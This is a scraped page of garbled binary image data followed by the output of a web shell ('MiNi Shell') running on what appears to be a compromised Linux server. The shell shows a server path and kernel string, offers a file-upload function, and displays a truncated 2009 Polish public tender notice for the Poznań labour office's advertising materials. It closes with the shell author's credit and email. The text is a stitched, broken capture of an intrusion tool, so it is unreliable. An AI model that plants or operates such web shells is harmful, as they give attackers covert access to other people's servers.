JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091012/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091012/174883-N-2009.html

<p class="kh_header"><b>Poznań: ZAPROJEKTOWANIE I WYKONANIE MATERIAŁÓW REKLAMOWYCH DLA WOJEWÓDZKIEGO URZĄDU PRACY W POZNANIU</b><br>
<b>Numer ogłoszenia: 174883 - 2009; data zamieszczenia: 12.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Poznaniu , ul. Kościelna 37, 60-537 Poznań, woj. wielkopolskie, tel. 061 8463819, faks 061 8463820.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup.poznzn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAPROJEKTOWANIE I WYKONANIE MATERIAŁÓW REKLAMOWYCH DLA WOJEWÓDZKIEGO URZĄDU PRACY W POZNANIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zaprojektowanie (w tym opracowanie projektów graficznych podlegających konsultacji i pisemnej akceptacji przez Zamawiającego) i wykonanie materiałów reklamowych dla Wojewódzkiego Urzędu Pracy w Poznaniu wymienionych w pkt 5 SIWZ(wizualizacje niektórych artykułów reklamowych stanowią załącznik nr 1 do SIWZ) do dnia 15 grudnia 2009 roku. W przypadku niedotrzymania przez Wykonawcę tego terminu, Zamawiający ma prawo odstąpić od umowy w trybie art. 492 KC w związku z art. 139 Pzp.
Projekty materiałów reklamowych zostaną wykonane przez Wykonawcę i przedstawione do pisemnej akceptacji Zamawiającego w terminie 7 dni roboczych od daty podpisania umowy. Dopuszczalne formy to przykładowy egzemplarz bez nadruku w przypadku produktów gotowych lub projekt graficzny w przypadku materiałów drukowanych. 
Do dokonywania w imieniu Zamawiającego pisemnej akceptacji dostarczonych przez Wykonawcę projektów graficznych oraz produktów gotowych będzie powołany zespół (pracownicy Wydziału Koordynacji i Kontroli PO KL).
Wzory materiałów mogą zostać dostarczone przez Wykonawcę bez planowanych nadruków. Ponadto Wykonawca w tym samym terminie (7 dni roboczych od daty podpisania umowy) dostarczy projekt umieszczenia wymaganych oznaczeń (logotypów) na artykułach reklamowych objętych zamówieniem. Na podstawie przedstawionych przez Wykonawcę wzorów materiałów reklamowych Zamawiający będzie dokonywał akceptacji (lub zgłosi uwagi do projektu) produktów objętych zamówieniem w terminie 5 dni roboczych od dnia przekazania przez Wykonawcę. Wykonawca jest zobowiązany do naniesienia wszelkich poprawek i zgłoszonych uwag przez Zamawiającego w terminie 3 dni roboczych i przekazania poprawionych materiałów do ponownej akceptacji Zamawiającego. Zamawiający może zgłaszać poprawki do przedstawionych przez Wykonawcę projektów graficznych lub produktów gotowych do momentu ich ostatecznej akceptacji. Uzgodnienie ostatecznego wyglądu wszystkich produktów objętych zamówieniem musi nastąpić nie później niż w ciągu 20 dni kalendarzowych od dnia zawarcia umowy. W przypadku niedotrzymania przez Wykonawcę tego terminu, Zamawiający ma prawo odstąpić od umowy w trybie art. 492 KC w związku z art.139 Pzp. Do produkcji Wykonawca przekaże artykuły reklamowe, które uzyskają pisemną akceptację Zamawiającego. Zarówno propozycja układu graficznego, jak i sposobu nadruku logo na materiałach reklamowych wymaga wcześniejszego uzgodnienia z Zamawiającym oraz jego pisemnej akceptacji. 
Zamawiający dopuszcza dokonanie zmian w treści umowy wynikających z uzasadnionych technicznie przyczyn (zmiana sposobu naniesienia oznaczeń logotypów na materiały reklamowe po uprzedniej pisemnej akceptacji Zamawiającego). Ponadto Zamawiający dopuszcza zmiany terminów w realizacji zamówienia z przyczyn niezależnych od obu stron.
Wykonawca zobowiązuje się do współpracy z Zamawiającym oraz do oddelegowania jednego pracownika celem bieżących kontaktów roboczych z Zamawiającym. Zamawiający wyznacza Panią Joannę Pawełek-Dunajewską, p.o. Z-cy Kierownika Oddziału Informacji i Pomocy Technicznej, jako pracownika merytorycznego do kontaktów roboczych (e-mail: j.pawelek-dunajewska@wup.poznan.pl) w zakresie przedmiotu zamówienia. 
Po dostarczeniu całego przedmiotu zamówienia Wykonawca wraz z fakturą dostarczy do siedziby Zamawiającego matryce i projekty, które po zrealizowaniu umowy staną się własnością Zamawiającego wraz z prawami autorskimi do nich.
Wykonawca zobligowany jest do stosowania zasad wynikających z aktualnie obowiązujących Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, znajdujących się na stronie internetowej Wojewódzkiego Urzędu Pracy w Poznaniu www.efs.wup.poznan.pl. Powyższy dokument zawiera wzory logotypów z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz logotypów Kapitał Ludzki Narodowa Strategia Spójności, które muszą zostać zastosowane do oznaczenia materiałów reklamowych. Logotyp WUP w Poznaniu zamieszczono w pkt 7 niniejszego rozdziału.
Wszelkie prawa autorskie po wykonaniu zamówienia przechodzą bez dodatkowych opłat w ramach zawartej umowy na Zamawiającego. 
Wykonawca jest zobowiązany do dostarczenia w stanie nienaruszonym nowych, nieużywanych artykułów reklamowych, w opakowaniach (zgodnie z opisem w SIWZ) opisanych (na boku opakowania) nazwą artykułu reklamowego, jego zdjęciem, a także ilością sztuk w środku. 
W przypadku wystąpienia wad w dostarczonych nowych i nie używanych materiałach reklamowych Wykonawca zobowiąże się do ich nieodpłatnej wymiany w terminie 14 dni roboczych od chwili zgłoszenia wad przez Zamawiającego (objęcie rękojmią przedmiotu zamówienia - 12 miesięcy od ich odbioru przez Zamawiającego).
Przedmiot zamówienia współfinansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Pomocy Technicznej Programu Operacyjnego Kapitał Ludzki wraz z zastosowaniem logotypów UE EFS oraz PO KL.
W celu doprecyzowania potrzeb Zamawiającego, do specyfikacji materiałów reklamowych zostały załączone zdjęcia produktów strategicznych (Załącznik nr 1).
Wykonawca odpowiada za transport (w tym załadunek i rozładunek do miejsca wskazanego przez Zamawiającego) na adres siedziby WUP w Poznaniu (ul. Kościelna 37 lub św. Wawrzyńca 3A). Dostawa materiałów reklamowych odbywać się będzie nie później niż do dnia 15 grudnia 2009 roku. Transport oraz rozładunek materiałów reklamowych do siedziby Zamawiającego odbywać się będzie na koszt Wykonawcy.
Wykonawca zobligowany jest do stosowania zasad wynikających z Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, znajdujących się na stronie internetowej Wojewódzkiego Urzędu Pracy w Poznaniu, www.efs.wup.poznan.pl. Powyższy dokument zawiera wzory logotypów UE, EFS, PO KL, które muszą zostać zastosowane do oznaczenia materiałów reklamowych.
Wymagania Zamawiającego odnoszące się do przedmiotu zamówienia (wymagane minimum) znajdują się w SIWZ.
Cena jednostkowa artykułu reklamowego nie może przekroczyć 100,00 zł. brutto.
awcy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy:
1. spełniają warunki wynikające z art. 22 ust.1 ustawy, tzn.:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
2. Zamawiający dokona oceny spełnienia warunków na podstawie złożonego oświadczenia i dokumentów opisanych w rozdziale 6) SIWZ, według formuły spełnia nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie wykonawcy o spełnieniu warunków określonych w art. 22 ustawy Pzp i niepodleganiu wykluczeniu na podstawie art. 24 ustawy Pzp, wedle wzoru stanowiącego załącznik nr 1 do formularza oferty; w przypadku, gdy ofertę składa kilka podmiotów złożenie oświadczeń dotyczy każdego z nich, w tym każdego członka konsorcjum.
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; w przypadku, gdy ofertę składa kilka podmiotów działających wspólnie, dotyczy to każdego z nich, w tym każdego członka konsorcjum;
3. Aktualne na dzień składania ofert zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego o niezaleganiu z opłatami oraz składkami na ubezpieczenie zdrowotne lub społeczne lub o uzyskaniu zgody na zwolnienie, odroczenie lub rozłożenie na raty zaległych opłat i składek (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert); w przypadku, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich, w tym każdego członka konsorcjum;
4. Aktualne na dzień składania ofert zaświadczenie od właściwego naczelnika Urzędu Skarbowego o niezaleganiu z opłacaniem podatków lub o uzyskaniu zgody na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert); w przypadku, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich, w tym każdego członka konsorcjum;
5. Wykonawca (w przypadku konsorcjum co najmniej jeden z Wykonawców) musi wykazać, w formie załączonego do oferty oświadczenia, że w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, licząc wstecz od dnia wszczęcia postępowania o udzielenie zamówienia, wykonał, tj. zrealizował co najmniej trzy zlecenia zaprojektowania oraz wykonania, artykułów reklamowych o charakterze zewnętrznym (załącznik nr 2 do formularza oferty) na kwotę co najmniej 70.000,00 zł brutto każde. Oświadczenie powinno zawierać nazwę i dane identyfikujące zleceniodawców, opis zakresu zamówień, terminy ich wykonania oraz wartości ceny brutto. Ponadto powinno być potwierdzone stosownym dokumentem uprzedniego zleceniodawcy o należytym wykonaniu zamówienia. 
6. Zamawiający wymaga aby w skład zespołu wyznaczonego przez Wykonawcę wchodziła jedna osoba będąca grafikiem. Zamawiający wymaga, aby Wykonawca zapewnił wysoką jakość projektów graficznych udokumentowaną referencjami świadczącymi o wykonaniu przez grafika lub firmę co najmniej trzech projektów graficznych - wymagane dołączenie referencji (załącznik nr 3 do formularza oferty).
7. Pełnomocnictwa (pełnomocnictw) dołączonego/ych w formie oryginału lub notarialnie poświadczonej kopii albo kopii poświadczonej za zgodność z oryginałem przez osoby udzielające pełnomocnictwa, jeśli oferta będzie podpisana przez pełnomocnika, przy czym dotyczy to również przypadków składania ofert przez podmioty występujące wspólnie, tj.:
7.1 wykonawców działających w formie spółki cywilnej, jeżeli z dokumentów dołączonych do oferty np. umowy spółki (czy jej kopii poświadczonej odpowiednio za zgodność z oryginałem) nie wynika odpowiedni dla podpisania oferty, bądź wynika inny sposób reprezentacji; 
7.2 wykonawców występujących wspólnie, czyli uczestników konsorcjum. 
8. Dokumenty, o których mowa w rozdziale 6) niniejszej specyfikacji, należy przedstawić w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez osobę/y uprawnioną/e do reprezentowania Wykonawcy.
9. Każdy z członków konsorcjum przedstawia dokumenty wymienione w niniejszym rozdziale pkt 1, 2, 3, 4. Dokumenty określone w rozdziale 6) pkt 5, 6, 7 przedstawia co najmniej jeden z Wykonawców tworzących konsorcjum.
10. W przypadku, gdy wykonawca ma siedzibę lub miejsce zamieszkania za granicą, w miejsce dokumentów, o których mowa w rozdziale 6) pkt 2, 3, 4 SIWZ zobowiązany jest przedłożyć dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio że: 
10.1 nie otwarto jego likwidacji ani nie ogłoszono upadłości, (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert); 
10.2 nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert);
10.3 nie orzeczono wobec niego zakazu ubiegania się o zamówienie, (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert); 
- odpowiednio dla pkt 5 składa: 
10.4 zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 Pzp, (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert); przy czym gdy ofertę składa kilka podmiotów działających wspólnie złożenie kompletu wymienionych wyżej dokumentów dotyczy to każdego z nich. 
11. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów, wykonawca może je zastąpić stosownym dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
12. Dokumenty, o których mowa w rozdziale 6) pkt 11 SIWZ, muszą być złożone w formie oryginału, odpisu, wypisu, wyciągu lub kopii, przetłumaczonych na język polski i poświadczonych przez wykonawcę za zgodność z oryginałem. 
13. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów (np. jeśli przedstawione kserokopie będą nieczytelne lub będą wzbudzać wątpliwości co do ich prawdziwości)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wup.poznan.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Poznaniu
ul. Kościelna 37
60-537 Poznań
IIp. pok. 33.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2009 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Poznaniu
ul. Kościelna 37
60-537 Poznań
IIp. pok. 33.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 19.11.2009.</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach

Creat By MiNi SheLL
Email: jattceo@gmail.com